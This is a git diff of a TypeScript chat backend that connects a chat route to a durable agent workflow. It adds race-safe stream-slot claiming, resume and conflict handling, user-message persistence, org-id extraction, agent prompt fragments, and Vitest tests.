+const CHAT_ID = "chat-1";
+const RUN_ID = "wrun_test"; // passed to the SUT as the chat's existing active stream id
+
+beforeEach(() => vi.clearAllMocks()); // fresh call history so not.toHaveBeenCalled() is per-test
+
+/** Stubs `getRun` with a run whose `status` resolves to `status`; `getReadable` is passed through. */
+function mockRun(status: string, getReadable: () => ReadableStream = () => new ReadableStream()) {
+  const settledStatus = Promise.resolve(status);
+  const fakeRun = { status: settledStatus, getReadable };
+  vi.mocked(getRun).mockReturnValue(fakeRun as never);
+}
+
+describe("reconcileExistingActiveStream", () => {
+  it("returns action=resume when status is 'running'", async () => {
+    const stream = new ReadableStream();
+    mockRun("running", () => stream);
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("resume");
+    if (result.action !== "resume") return; // narrows the union for the two checks below
+    expect(result.runId).toBe(RUN_ID);
+    expect(result.stream).toBe(stream);
+  });
+
+  it("returns action=resume when status is 'pending'", async () => {
+    mockRun("pending");
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("resume");
+  });
+
+  it("returns action=ready after CASing a completed run's stale id to null", async () => {
+    mockRun("completed");
+    vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: true, claimed: true });
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("ready");
+    expect(compareAndSetChatActiveStreamId).toHaveBeenCalledWith(CHAT_ID, RUN_ID, null);
+  });
+
+  it("returns action=conflict when getRun throws (transient workflow API error)", async () => {
+    vi.mocked(getRun).mockImplementation(() => {
+      throw new Error("workflow API unreachable");
+    });
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("conflict");
+    // Critical: we do NOT clear the stream id on transient error.
+    expect(compareAndSetChatActiveStreamId).not.toHaveBeenCalled();
+  });
+
+  it("returns action=conflict when status promise rejects", async () => {
+    // Build an already-rejected promise and pre-attach a no-op catch (below) so
+    // Vitest's unhandled-rejection watcher doesn't flag it before the SUT awaits.
+    const rejection: Promise<string> = (async () => {
+      throw new Error("status fetch failed");
+    })();
+    rejection.catch(() => {
+      /* attach a handler so it's not 'unhandled' before the SUT awaits */
+    });
+    vi.mocked(getRun).mockReturnValue({
+      status: rejection,
+      getReadable: () => new ReadableStream(),
+    } as never);
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("conflict");
+    expect(compareAndSetChatActiveStreamId).not.toHaveBeenCalled();
+  });
+
+  it("returns action=conflict when CAS-clear loses the race (claimed=false)", async () => {
+    mockRun("completed");
+    vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: true, claimed: false });
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("conflict");
+  });
+
+  it("returns action=conflict when CAS-clear hits a DB error (ok:false)", async () => {
+    mockRun("completed");
+    vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: false, error: "down" });
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    // P1 fix: a DB error from the CAS-clear no longer falls through to "ready".
+    expect(result.action).toBe("conflict");
+  });
+});
diff --git a/lib/chat/agentCustomInstructions.ts b/lib/chat/agentCustomInstructions.ts
new file mode 100644
index 000000000..0a3191ea7
--- /dev/null
+++ b/lib/chat/agentCustomInstructions.ts
@@ -0,0 +1,9 @@
+import { assistantFileLinkPrompt } from "@/lib/chat/assistantFileLinks";
+import { recoupApiSkillPrompt } from "@/lib/chat/recoupApiSkillPrompt";
+
+/**
+ * Shared instruction suffix for chat-workflow prompts: the file-link
+ * formatting rules, a blank line, then the Recoup skill nudge. Assembled once
+ * here so the route and its tests use the same string.
+ */
+export const agentCustomInstructions = `${assistantFileLinkPrompt}\n\n${recoupApiSkillPrompt}`;
diff --git a/lib/chat/assistantFileLinks.ts b/lib/chat/assistantFileLinks.ts
new file mode 100644
index 000000000..b5bd9280f
--- /dev/null
+++ b/lib/chat/assistantFileLinks.ts
@@ -0,0 +1,28 @@
+const WORKSPACE_FILE_HREF_PREFIX = "#workspace-file="; // hash-fragment marker placed in front of every workspace file href
+
+function normalizeWorkspaceFilePath(filePath: string): string {
+  return filePath.split("\\").join("/").trim(); // backslashes → "/", then drop outer whitespace
+}
+
+/**
+ * Href for a workspace file: `#workspace-file=` followed by the normalized path.
+ *
+ * @param filePath - Path to link; backslashes become `/`, outer whitespace is trimmed.
+ * @returns The prefixed href fragment, e.g. `#workspace-file=src/index.ts`.
+ */
+export function buildWorkspaceFileHref(filePath: string): string {
+  return WORKSPACE_FILE_HREF_PREFIX.concat(normalizeWorkspaceFilePath(filePath));
+}
+
+/**
+ * Prompt fragment (lines joined with "\n") telling the assistant to write
+ * workspace file paths as markdown links that target a `#workspace-file=` href.
+ */
+export const assistantFileLinkPrompt = [
+  "When you mention a workspace file path in assistant text, render it as a markdown link using this exact format:",
+  `- \`[path/to/file.ts](${buildWorkspaceFileHref("path/to/file.ts")})\``,
+  "- Use the repo-relative file path as both the visible link text and the path inside the link.",
+  "- Whole-file links only for now. Do not include line numbers or ranges.",
+  "- Do not use this format for URLs or anything that is not a real workspace file path.",
+  "- If you are not sure of the exact file path, do not invent one.",
+].join("\n");
diff --git a/lib/chat/compareAndSetChatActiveStreamId.ts b/lib/chat/compareAndSetChatActiveStreamId.ts
new file mode 100644
index 000000000..b3b218245
--- /dev/null
+++ b/lib/chat/compareAndSetChatActiveStreamId.ts
@@ -0,0 +1,49 @@
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+/**
+ * Outcome of a compare-and-set on `chats.active_stream_id`. Three cases that
+ * callers must tell apart:
+ *   - `{ ok: false, error }` — the update itself failed (Supabase / network).
+ *     Kept separate from a lost race so an unhealthy DB is not reported as a
+ *     misleading 409.
+ *   - `{ ok: true, claimed: true }` — the row held the expected value and now
+ *     holds `next`.
+ *   - `{ ok: true, claimed: false }` — no row matched the predicate: the race
+ *     was lost or `active_stream_id` is in some other state.
+ */
+export type CasChatActiveStreamIdResult =
+  | { ok: false; error: string }
+  | { ok: true; claimed: boolean };
+
+/**
+ * Compare-and-set for `chats.active_stream_id`: writes `next` only when the
+ * column currently equals `expected`. Implemented as a conditional
+ * `updateChat` so the stream-slot concept lives in the chat domain instead
+ * of the Supabase helpers.
+ *
+ * `/api/chat/workflow` relies on it to:
+ *   - claim the slot before `start(workflow)` (`null` → `"pending-<uuid>"`);
+ *   - promote that placeholder to the real run id once the run exists;
+ *   - release a stale slot from `reconcileExistingActiveStream`.
+ *
+ * @param chatId - Chat whose slot is being swapped.
+ * @param expected - Value the column must hold now (`null` = slot must be free).
+ * @param next - Value to store (`null` = release the slot).
+ * @returns Whether the swap applied, lost, or failed — see `CasChatActiveStreamIdResult`.
+ */
+export async function compareAndSetChatActiveStreamId(
+  chatId: string,
+  expected: string | null,
+  next: string | null,
+): Promise<CasChatActiveStreamIdResult> {
+  const predicate = { id: chatId, where: { active_stream_id: expected } };
+  const patch = { active_stream_id: next };
+  const outcome = await updateChat(predicate, patch);
+
+  // A result carrying `error` means the update itself failed.
+  if ("error" in outcome) return { ok: false, error: outcome.error };
+
+  // Otherwise the swap happened only if the predicate matched a row.
+  const claimed = outcome.rowsUpdated > 0;
+  return { ok: true, claimed };
+}
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
index 137f699cb..dcaad8585 100644
--- a/lib/chat/handleChatWorkflowStream.ts
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -1,31 +1,56 @@
 import { NextRequest, NextResponse } from "next/server";
-import { createUIMessageStream, createUIMessageStreamResponse } from "ai";
+import { createUIMessageStreamResponse, type UIMessageChunk } from "ai";
+import { start, getRun } from "workflow/api";
 import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
+import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream";
 import { selectSessions } from "@/lib/supabase/sessions/selectSessions";
 import { selectChats } from "@/lib/supabase/chats/selectChats";
+import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId";
 import { isSandboxActive } from "@/lib/sandbox/isSandboxActive";
+import { buildActiveLifecycleUpdate } from "@/lib/sandbox/buildActiveLifecycleUpdate";
+import { updateSession } from "@/lib/supabase/sessions/updateSession";
+import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage";
 import { errorResponse } from "@/lib/networking/errorResponse";
 import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
+import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow";
 import generateUUID from "@/lib/uuid/generateUUID";
 
+const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5";
+
 /**
  * Handles POST /api/chat/workflow.
  *
- * Stub implementation: delegates auth + body validation to validateChatWorkflow,
- * verifies ownership of the referenced session + chat, confirms the session's
- * sandbox is active, then returns a hardcoded UIMessage stream with an
- * `x-workflow-run-id` header. The Vercel Workflow that will eventually drive
- * the agent loop is wired up in a follow-up PR — this stub exists so clients
- * can integrate against the contract documented at
- * /api-reference/chat/workflow.
+ * Wires the chat UI to a durable Vercel Workflow agent loop. Flow:
+ *
+ *   1. Validate auth + body (validateChatWorkflow).
+ *   2. Verify session + chat ownership; ensure the session has an active sandbox.
+ *   3. If a workflow is already running for this chat, resume / 409 via
+ *      maybeResumeChatStream (extracted for OCP).
+ *   4. **Claim `chats.active_stream_id` BEFORE starting the workflow** using
+ *      a `pending-<uuid>` placeholder CAS. Closes the race window where two
+ *      concurrent requests could both call `start()` and bill the model
+ *      before one loses the CAS.
+ *   5. Refresh the session's lifecycle-activity timestamp + fire-and-forget
+ *      persist the latest user message.
+ *   6. start(runAgentWorkflow), then CAS-promote the placeholder to the real
+ *      run id. A failed start releases the slot; a failed promote cancels the run.
+ *   7. Return the workflow's UIMessage stream with x-workflow-run-id header.
+ *
+ * If we lost the placeholder CAS in step 4, the slot is already held by
+ * another in-flight or pending request → 409 (no workflow was started, so
+ * nothing to cancel).
  *
- * @param request - The incoming NextRequest
- * @returns A streaming Response (200) or a NextResponse error.
+ * Tools/sandbox passing is intentionally not wired here yet — the follow-up
+ * PR ports the @open-harness/agent tool surface into api.
+ *
+ * @param request - The incoming NextRequest.
+ * @returns A streaming 200 Response or a NextResponse error.
  */
 export async function handleChatWorkflowStream(request: NextRequest): Promise<Response> {
   const validated = await validateChatWorkflow(request);
   if (validated instanceof NextResponse) return validated;
 
+  // Session + ownership + sandbox active
   const sessions = await selectSessions({ id: validated.sessionId });
   if (sessions === null) return errorResponse("Internal server error", 500);
   const session = sessions[0];
@@ -33,29 +58,81 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
   if (session.account_id !== validated.accountId) return errorResponse("Forbidden", 403);
   if (!isSandboxActive(session)) return errorResponse("Sandbox not initialized", 400);
 
+  // Chat + ownership
   const chats = await selectChats({ id: validated.chatId });
   const chat = chats[0];
   if (!chat || chat.session_id !== validated.sessionId) {
     return errorResponse("Chat not found", 404);
   }
 
-  const runId = `stub-${generateUUID()}`;
+  // Resume an in-flight workflow for this chat (or 409) before starting a new one.
+  const resumed = await maybeResumeChatStream(validated.chatId, chat.active_stream_id);
+  if (resumed) return resumed;
+
+  // Pre-claim the active_stream_id slot with a placeholder BEFORE starting
+  // the workflow. This closes the race where two requests both call start()
+  // and bill the model before one loses the CAS.
+  const placeholder = `pending-${generateUUID()}`;
+  const claimed = await compareAndSetChatActiveStreamId(validated.chatId, null, placeholder);
+  if (!claimed.ok) return errorResponse("Internal server error", 500);
+  if (!claimed.claimed) {
+    return errorResponse("Another workflow is already running for this chat", 409);
+  }
+
+  // Best-effort release of our placeholder. The CAS is keyed on the placeholder
+  // value, so it changes nothing once the slot has been promoted or taken over.
+  const releasePlaceholder = async (): Promise<void> => {
+    try {
+      const released = await compareAndSetChatActiveStreamId(validated.chatId, placeholder, null);
+      if (!released.ok) {
+        console.error("[handleChatWorkflowStream] placeholder release failed:", released.error);
+      }
+    } catch (error) {
+      console.error("[handleChatWorkflowStream] placeholder release failed:", error);
+    }
+  };
 
-  const stream = createUIMessageStream({
-    generateId: generateUUID,
-    execute: ({ writer }) => {
-      const id = generateUUID();
-      writer.write({ type: "text-start", id });
-      writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" });
-      writer.write({ type: "text-end", id });
-    },
-  });
+  // We own the slot — safe to start the workflow. If anything throws before a
+  // run exists, give the slot back: a leftover `pending-…` id would otherwise
+  // keep sending later requests for this chat down the resume/409 path.
+  const modelId = chat.model_id ?? DEFAULT_MODEL_ID;
+  const startRun = async () => {
+    await updateSession(validated.sessionId, buildActiveLifecycleUpdate(session.sandbox_state));
+    void persistLatestUserMessage(validated.chatId, validated.messages as never);
+    return start(runAgentWorkflow, [
+      {
+        messages: validated.messages,
+        chatId: validated.chatId,
+        sessionId: validated.sessionId,
+        modelId,
+      },
+    ]);
+  };
+  let run: Awaited<ReturnType<typeof startRun>>;
+  try {
+    run = await startRun();
+  } catch (error) {
+    await releasePlaceholder();
+    throw error;
+  }
+
+  // Promote placeholder → real run id via CAS. If something asynchronously
+  // stole the slot (or the DB went down) we cancel the workflow we just
+  // started since another stream now owns the client.
+  const promoted = await compareAndSetChatActiveStreamId(validated.chatId, placeholder, run.runId);
+  if (!promoted.ok || !promoted.claimed) {
+    try {
+      await getRun(run.runId).cancel();
+    } catch (error) {
+      console.error("[handleChatWorkflowStream] cancel after slot-loss failed:", error);
+    }
+    // Covers the DB-error case where the placeholder may still hold the slot.
+    await releasePlaceholder();
+    return errorResponse("Another workflow is already running for this chat", 409);
+  }
 
   return createUIMessageStreamResponse({
-    stream,
-    headers: {
-      ...getCorsHeaders(),
-      "x-workflow-run-id": runId,
-    },
+    stream: run.getReadable<UIMessageChunk>(),
+    headers: { ...getCorsHeaders(), "x-workflow-run-id": run.runId },
   });
 }
diff --git a/lib/chat/maybeResumeChatStream.ts b/lib/chat/maybeResumeChatStream.ts
new file mode 100644
index 000000000..209113fbf
--- /dev/null
+++ b/lib/chat/maybeResumeChatStream.ts
@@ -0,0 +1,40 @@
+import { createUIMessageStreamResponse, type UIMessageChunk } from "ai";
+import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream";
+import { errorResponse } from "@/lib/networking/errorResponse";
+import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
+
+/**
+ * Handles the "this chat already has an `active_stream_id`" branch of the
+ * POST /api/chat/workflow handler, kept separate so the handler stays short.
+ *
+ * Outcomes:
+ *   - no `activeStreamId` → `null` (nothing to resume; start a fresh workflow);
+ *   - reconcile says "resume" → streaming `Response` piping the existing run's
+ *     readable, tagged with `x-workflow-run-id`;
+ *   - reconcile says "conflict" → 409 `Response`;
+ *   - reconcile says "ready" → `null` (caller starts a new workflow).
+ *
+ * @param chatId - Chat being posted to.
+ * @param activeStreamId - The chat's current `active_stream_id`, if any.
+ * @returns A `Response` to send as-is, or `null` when the caller should proceed.
+ */
+export async function maybeResumeChatStream(
+  chatId: string,
+  activeStreamId: string | null,
+): Promise<Response | null> {
+  if (!activeStreamId) return null;
+
+  const outcome = await reconcileExistingActiveStream(chatId, activeStreamId);
+  switch (outcome.action) {
+    case "resume": {
+      const stream = outcome.stream as ReadableStream<UIMessageChunk>;
+      const headers = { ...getCorsHeaders(), "x-workflow-run-id": outcome.runId };
+      return createUIMessageStreamResponse({ stream, headers });
+    }
+    case "conflict":
+      return errorResponse("Another workflow is already running for this chat", 409);
+    default:
+      // "ready": the caller goes on to start a new workflow.
+      return null;
+  }
+}
diff --git a/lib/chat/persistLatestUserMessage.ts b/lib/chat/persistLatestUserMessage.ts
new file mode 100644
index 000000000..73c06f5ef
--- /dev/null
+++ b/lib/chat/persistLatestUserMessage.ts
@@ -0,0 +1,84 @@
+import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage";
+import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages";
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+type TextPart = { type: "text"; text: string }; // the only part kind read when building a title
+type UserMessage = { id: string; role: string; parts: Array<TextPart | { type: string }> };
+
+const TITLE_MAX_LENGTH = 80; // upper bound on title length, truncation suffix included
+const TRUNCATION_SUFFIX = "…";
+const TITLE_BODY_BUDGET = TITLE_MAX_LENGTH - TRUNCATION_SUFFIX.length; // message text kept when truncating
+
+/**
+ * Best-effort persistence of the latest user message in a chat-workflow
+ * request; the handler fires it without awaiting, before starting the run, so:
+ *
+ *   - A page refresh during workflow queue time still shows the user message.
+ *   - The chat's `updated_at` reflects activity even if the workflow hasn't
+ *     produced its first chunk yet.
+ *   - The chat title is set from the earliest message's text parts, capped at
+ *     TITLE_MAX_LENGTH characters including the truncation suffix. The cut
+ *     never splits a surrogate pair, so such a title may be one unit shorter.
+ *
+ * Does nothing unless the last entry of `messages` has role "user" and its
+ * insert was new. Every failure is caught and logged; this never throws.
+ *
+ * @param chatId - The target chat.
+ * @param messages - The full message list from the request body.
+ */
+export async function persistLatestUserMessage(
+  chatId: string,
+  messages: UserMessage[],
+): Promise<void> {
+  try {
+    const latest = messages[messages.length - 1];
+    if (!latest || latest.role !== "user") return;
+
+    const inserted = await upsertChatMessage({
+      id: latest.id,
+      chat_id: chatId,
+      role: "user",
+      parts: latest as never,
+    });
+
+    // Failed insert: we can't confirm the message landed, so leave the chat as is.
+    if (!inserted.ok) return;
+
+    // If it was a duplicate, the original insert already drove side effects.
+    if (inserted.isDuplicate || inserted.row === null) return;
+
+    await updateChat({ id: chatId }, { updated_at: new Date().toISOString() });
+
+    // Only title from this message if its row is the earliest one in the chat;
+    // if another message sorts first we skip.
+    const earliest = await selectChatMessages({
+      chatId,
+      orderBy: { createdAt: "asc" },
+      limit: 1,
+    });
+
+    // DB-error or no rows — bail without titling.
+    if (!earliest || earliest.length === 0) return;
+    if (earliest[0]?.id !== inserted.row.id) return;
+
+    const text = latest.parts
+      .filter((part): part is TextPart => part.type === "text")
+      .map(part => part.text)
+      .join(" ")
+      .trim();
+    if (text.length === 0) return;
+
+    let title = text;
+    if (text.length > TITLE_MAX_LENGTH) {
+      let body = text.slice(0, TITLE_BODY_BUDGET);
+      // Never cut between the halves of a surrogate pair: a dangling high
+      // surrogate is not well-formed text.
+      const tail = body.charCodeAt(body.length - 1);
+      if (tail >= 0xd800 && tail <= 0xdbff) body = body.slice(0, -1);
+      title = `${body}${TRUNCATION_SUFFIX}`;
+    }
+    await updateChat({ id: chatId }, { title });
+  } catch (error) {
+    console.error("[persistLatestUserMessage] error:", error);
+  }
+}
diff --git a/lib/chat/reconcileExistingActiveStream.ts b/lib/chat/reconcileExistingActiveStream.ts
new file mode 100644
index 000000000..4ab004493
--- /dev/null
+++ b/lib/chat/reconcileExistingActiveStream.ts
@@ -0,0 +1,56 @@
+import { getRun } from "workflow/api";
+import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId";
+
+export type ReconcileResult =
+  | { action: "resume"; runId: string; stream: ReadableStream<unknown> }
+  | { action: "ready" } // stale id was cleared — caller starts a fresh workflow
+  | { action: "conflict" }; // could neither resume nor clear — surfaces as 409 upstream
+
+const RUNNING_STATUSES = new Set(["running", "pending"]); // run statuses treated as still alive
+
+/**
+ * Decides how a new chat-workflow request should treat a chat whose
+ * `active_stream_id` is already set.
+ *
+ *   - Run status is `running` or `pending` → `action: "resume"` carrying the
+ *     run's readable, which the caller pipes back to the client.
+ *   - Run has any other status and the CAS that clears the stale id succeeds
+ *     → `action: "ready"`; the caller starts a fresh workflow.
+ *   - Everything else — `getRun`/status throws, the CAS-clear loses the race,
+ *     or the CAS reports a DB error → `action: "conflict"` (409 upstream).
+ *
+ * Error semantics are deliberately stricter than open-agents': a transient
+ * `workflow/api` failure does NOT clear the stream id, because doing so
+ * opened a window for duplicate runs. When the run can't be shown to be
+ * dead, no new one is started; once it finishes, a later request sees the
+ * terminal status, clears the slot, and proceeds.
+ *
+ * @param chatId - Chat whose slot is being reconciled.
+ * @param activeStreamId - The run id currently stored in `active_stream_id`.
+ * @returns `resume` (with the stream), `ready`, or `conflict`, as described
+ *   above.
+ */
+export async function reconcileExistingActiveStream(
+  chatId: string,
+  activeStreamId: string,
+): Promise<ReconcileResult> {
+  // Any throw while probing the run counts as transient: report a conflict and
+  // leave the slot untouched rather than risk a duplicate run.
+  try {
+    const run = getRun(activeStreamId);
+    const runStatus: string = await run.status;
+    const isAlive = RUNNING_STATUSES.has(runStatus);
+    if (isAlive) {
+      return { action: "resume", runId: activeStreamId, stream: run.getReadable() };
+    }
+  } catch (error) {
+    console.error("[reconcileExistingActiveStream] getRun failed; treating as conflict:", error);
+    return { action: "conflict" };
+  }
+
+  // Status is not a running one: try to CAS the stale id away. Only a
+  // confirmed clear yields "ready"; a lost race or DB error is a conflict.
+  const cleared = await compareAndSetChatActiveStreamId(chatId, activeStreamId, null);
+  const slotReleased = cleared.ok && cleared.claimed;
+  return slotReleased ? { action: "ready" } : { action: "conflict" };
+}
diff --git a/lib/chat/recoupApiSkillPrompt.ts b/lib/chat/recoupApiSkillPrompt.ts
new file mode 100644
index 000000000..93f4d2e39
--- /dev/null
+++ b/lib/chat/recoupApiSkillPrompt.ts
@@ -0,0 +1,11 @@
+/**
+ * Always-on nudge appended to the agent's system instructions. It tells
+ * the agent to pick a skill before answering anything about the user's
+ * Recoup account: `artist-workspace` for sandbox inventory and create-
+ * artist scaffolding (the `artists/{artist-slug}/RECOUP.md` tree), and
+ * `recoup-api` for live data or anything not in that tree, scoped to
+ * `RECOUP_ORG_ID` when it is set. The aim is to stop the agent guessing
+ * endpoint paths or reading overloaded nouns like "tasks" as repo TODOs.
+ */
+export const recoupApiSkillPrompt =
+  'If you\'re asked about anything belonging to their Recoup account — artists, socials, orgs, research, tasks, chats, pulses, notifications, subscriptions, or any other resource visible at recoup-api.vercel.app / developers.recoupable.com — pick the right skill first instead of guessing. For inventory questions about this sandbox ("what artists / orgs do I have", "list my artists", "what\'s in here") load `artist-workspace` — the `artists/{artist-slug}/RECOUP.md` tree is authoritative for this sandbox (the sandbox is already org-scoped — its repo IS the org — so artists live at the top level, not under an `orgs/` directory) and the API is not. For create-artist intents ("create artist", "onboard X", "add an artist", "set up a new artist") also load `artist-workspace` first — it scaffolds the artist\'s `RECOUP.md` as a checklist file you tick off step-by-step, which is what keeps the 8-step chain from dropping steps when run from a sandbox; the curl-by-curl reference for each step lives via `recoup-api` (developers.recoupable.com/workflows/create-artist), but the checklist file is the source of truth for what\'s done. For live data (socials, posts, metrics, research, tasks, notifications) or anything not in the tree, load `recoup-api` — and when `RECOUP_ORG_ID` is set in the env, scope list endpoints to that org (`/api/organizations/$RECOUP_ORG_ID/...`, `--org $RECOUP_ORG_ID` on the CLI) so you get results for the sandbox\'s org, not every org the user belongs to. Treat ambiguous account-data questions as Recoup questions by default, not repo-level TODOs.';
diff --git a/lib/recoupable/__tests__/extractOrgId.test.ts b/lib/recoupable/__tests__/extractOrgId.test.ts
new file mode 100644
index 000000000..c38232c4c
--- /dev/null
+++ b/lib/recoupable/__tests__/extractOrgId.test.ts
@@ -0,0 +1,57 @@
+import { describe, it, expect } from "vitest";
+import { extractOrgId } from "@/lib/recoupable/extractOrgId";
+
+describe("extractOrgId", () => {
+  it("extracts the UUID tail from a full clone URL", () => {
+    expect(
+      extractOrgId(
+        "https://github.com/recoupable/org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a",
+      ),
+    ).toBe("cebcc866-34c3-451c-8cd7-f63309acff0a"); // host, owner, `org-` prefix and slug are all dropped
+  });
+
+  it("strips a .git suffix before extracting", () => {
+    expect(
+      extractOrgId(
+        "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6.git",
+      ),
+    ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6");
+  });
+
+  it("tolerates a trailing slash on the URL", () => {
+    expect(
+      extractOrgId(
+        "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6/",
+      ),
+    ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6");
+  });
+
+  it("accepts an already-extracted repo name", () => {
+    expect(extractOrgId("org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a")).toBe(
+      "cebcc866-34c3-451c-8cd7-f63309acff0a",
+    );
+  });
+
+  it("lowercases an uppercase UUID", () => {
+    expect(extractOrgId("org-myco-wtf-80263819-9DFD-4BBF-9371-60A6185122D6")).toBe(
+      "80263819-9dfd-4bbf-9371-60a6185122d6",
+    );
+  });
+
+  it("returns null for non-Recoupable clone URLs", () => {
+    expect(
+      extractOrgId(
+        "https://github.com/someone-else/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6",
+      ),
+    ).toBeNull(); // same repo name as above, but under a different GitHub owner
+  });
+
+  it("returns null when the repo name has no UUID tail", () => {
+    expect(extractOrgId("org-rostrum-pacific")).toBeNull();
+  });
+
+  it("returns null for malformed strings", () => {
+    expect(extractOrgId("")).toBeNull();
+    expect(extractOrgId("not-a-url-or-repo")).toBeNull();
+  });
+});
diff --git a/lib/recoupable/extractOrgId.ts b/lib/recoupable/extractOrgId.ts
new file mode 100644
index 000000000..ac30985c5
--- /dev/null
+++ b/lib/recoupable/extractOrgId.ts
@@ -0,0 +1,31 @@
+import { extractOrgRepoName } from "@/lib/recoupable/extractOrgRepoName";
+
+// A hyphen followed by an 8-4-4-4-12 hex UUID at the very end of the string (case-insensitive).
+const UUID_TAIL_PATTERN = /-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$/i;
+
+/**
+ * Pulls the organization UUID out of a Recoupable org clone URL or repo
+ * name. Org repos are named `org-<slug>-<uuid>`, so the id is whatever
+ * UUID-shaped text ends the repo name.
+ *
+ * Inputs starting with "http" are first reduced to a repo name via
+ * `extractOrgRepoName`; anything else is treated as a repo name already.
+ *
+ * The chat workflow handler uses this to derive `recoupOrgId` from the
+ * session's clone URL, which lets the `recoup-api` skill scope calls to the
+ * sandbox's org instead of every org the user belongs to.
+ *
+ * @param cloneUrlOrRepoName - Either the full clone URL
+ *   (`https://github.com/recoupable/org-foo-<uuid>`) or the already-extracted
+ *   repo name (`org-foo-<uuid>`).
+ * @returns The lowercased UUID, or `null` when no repo name could be derived
+ *   or it does not end in a UUID.
+ */
+export function extractOrgId(cloneUrlOrRepoName: string): string | null {
+  const isUrl = cloneUrlOrRepoName.startsWith("http");
+  const repoName = isUrl ? extractOrgRepoName(cloneUrlOrRepoName) : cloneUrlOrRepoName;
+  if (!repoName) return null;
+
+  const uuid = UUID_TAIL_PATTERN.exec(repoName)?.[1];
+  return uuid === undefined ? null : uuid.toLowerCase();
+}
diff --git a/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts
new file mode 100644
index 000000000..c973f24df
--- /dev/null
+++ b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts
@@ -0,0 +1,58 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages";
+
+const selectChain = vi.fn(); // stands in for supabase.from(...).select
+const eqChain = vi.fn();
+const orderChain = vi.fn();
+const limitChain = vi.fn();
+
+vi.mock("@/lib/supabase/serverClient", () => ({
+  default: {
+    from: vi.fn(() => ({ select: selectChain })),
+  },
+}));
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  // Allow any number of chained .eq() / .order() / .limit() calls — they all
+  // return the same fluent builder. Tests override the last link of the chain
+  const builder = { eq: eqChain, order: orderChain, limit: limitChain }; // with a resolved value.
+  selectChain.mockReturnValue(builder);
+  eqChain.mockReturnValue(builder);
+  orderChain.mockReturnValue(builder);
+  limitChain.mockReturnValue(builder);
+});
+
+describe("selectChatMessages", () => {
+  it("returns rows on success", async () => {
+    limitChain.mockResolvedValue({ data: [{ id: "m-1" }], error: null }); // limit() ends the chain here
+    const result = await selectChatMessages({
+      chatId: "c-1",
+      orderBy: { createdAt: "asc" },
+      limit: 1,
+    });
+    expect(result).toEqual([{ id: "m-1" }]);
+    expect(eqChain).toHaveBeenCalledWith("chat_id", "c-1");
+    expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: true });
+    expect(limitChain).toHaveBeenCalledWith(1);
+  });
+
+  it("returns null on Supabase error (so callers can distinguish from empty)", async () => {
+    // No filter, order, or limit is passed, so the error is injected on selectChain itself.
+    selectChain.mockResolvedValue({ data: null, error: { message: "down" } });
+    const result = await selectChatMessages({});
+    expect(result).toBeNull();
+  });
+
+  it("returns [] on no match", async () => {
+    limitChain.mockResolvedValue({ data: [], error: null });
+    const result = await selectChatMessages({ chatId: "c-1", limit: 1 });
+    expect(result).toEqual([]);
+  });
+
+  it("applies desc ordering when requested", async () => {
+    limitChain.mockResolvedValue({ data: [], error: null });
+    await selectChatMessages({ chatId: "c-1", orderBy: { createdAt: "desc" }, limit: 1 });
+    expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: false });
+  });
+});
diff --git a/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts
new file mode 100644
index 000000000..0ea559058
--- /dev/null
+++ b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts
@@ -0,0 +1,46 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage";
+
+const upsertChain = vi.fn();
+const selectChain = vi.fn();
+const maybeSingleChain = vi.fn(); // terminal call — each test sets its resolved value
+
